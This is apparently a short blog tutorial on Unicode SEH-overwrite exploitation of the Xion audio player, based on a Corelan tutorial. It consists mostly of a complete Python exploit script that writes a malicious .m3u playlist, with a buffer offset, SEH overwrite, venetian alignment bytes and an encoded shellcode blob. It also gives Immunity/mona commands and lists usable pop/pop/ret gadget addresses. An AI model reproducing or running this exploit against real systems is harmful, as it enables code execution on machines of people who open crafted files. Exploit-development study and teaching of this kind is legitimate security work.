Unicode Exploitation Techniques
Below instructions make us point to shellcode
0012F2D0 50 PUSH EAX
0012F2D1 006D 00 ADD BYTE PTR SS:[EBP],CH
0012F2D4 C3 RETN
#!c:\python27\python.exe import struct total_buf_size=5000 # 228 offset buf1 = "A" * 228 #nseh = "MM" nseh = "\x61\x62" # seh = "NN" seh = "\x15\x45" print "seh: ", len(seh) prep_stack = "D" prep_stack = prep_stack + "\x6e" #nop/align prep_stack = prep_stack + "\x55" #push ebp prep_stack = prep_stack + "\x6e" #nop/align prep_stack = prep_stack + "\x58" #pop eax=> ebp into eax prep_stack = prep_stack + "\x6e" #pop/align prep_stack = prep_stack + "\x05\x14\x11" #add eax,11001400 prep_stack = prep_stack + "\x6e" #pop/align prep_stack = prep_stack + "\x2d\x13\x11" #sub eax,11001300 prep_stack = prep_stack + "\x6e" #pop/align print "prep_stack len=", len(prep_stack) prep_jump = "\x50" #push eax prep_jump = prep_jump + "\x6d" #nop/align prep_jump = prep_jump + "\xc3" #ret print "prep_jump len=", len(prep_jump) # offset between the last instruction 0012f3ac and # our venetian jumpcode (c3 = ret) 0012f2d4 # to make sure shellcode is at eax loca = "D"*107 shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERCQQ2LRCM0LJA" remaining_buf = "D" * (total_buf_size -(len(buf1) + len(nseh)+len(seh)+len(prep_stack)+len(prep_jump) + len(loca) + len(shellcode))) payload = buf1 + nseh + seh + prep_stack + prep_jump + loca + shellcode + remaining_buf print "Payload length ", len(payload) try: fh = open("xion_uni_m3u.m3u", "w") fh.write(payload) fh.close() except: print "Unable to create m3u file!\n"
To Generate cyclic pattern
!mona pc 1500
To find offset of in cyclic pattern at the time of crash
!mona findmsp
To search registers holding pop/pop/ret
!mona seh -cp unicode
seh.txt will be created under C:\Program Files\Immunity Inc\Immunity Debugger. Following is the list of address of our interest, search for string "unicode" in seh.txt.
0x00450015 : pop ebx # pop ebp # ret |startnull,unicode,# asciiprint,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 # (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004800f5 : pop ebx # pop ebp # ret | startnull,unicode # {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00410079 : pop edi # pop esi # ret 0x04 | startnull,unicode,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004400c0 : pop edi # pop esi # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00470166 : pop edi # pop ebp # ret | startnull,unicode possible ansi transform(s) : 0047009A->00470161,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
This article is fully based on Peter Van Eeckhoutte's Unicode exploiting tutorial.
References
https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
http://www.fuzzysecurity.com/tutorials/expDev/5.html
No comments:
Post a Comment